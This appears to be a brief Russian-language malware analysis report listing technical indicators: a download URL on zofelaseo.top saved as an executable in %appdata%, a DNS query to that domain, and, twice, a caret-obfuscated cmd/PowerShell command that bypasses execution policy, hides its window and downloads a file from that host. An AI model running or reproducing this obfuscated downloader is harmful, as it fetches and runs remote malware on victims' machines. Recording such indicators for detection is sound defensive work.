Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^W^Er^sHel^l.eXE^ ^-e^XECu^Ti^o^Np^OLiCy ^bYpASs^ ^-NoP^rOF^i^l^E -w^indOWSt^yL^E hiDDEN ^(^nEW^-obJeC^t^ s^y^STem.NE^t.W^e^bcLiEN^t).Do^wnlOaD^f^iLE(^'http://zofelaseo.top/read.p...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "PO^W^Er^sHel^l.eXE^ ^-e^XECu^Ti^o^Np^OLiCy ^bYpASs^ ^-NoP^rOF^i^l^E -w^indOWSt^yL^E hiDDEN ^(^nEW^-obJeC^t^ s^y^STem.NE^t.W^e^bcLiEN^t).Do^wnlOaD^f^iLE(^'http://zofelaseo.top/read.p...' (со скрытым окном)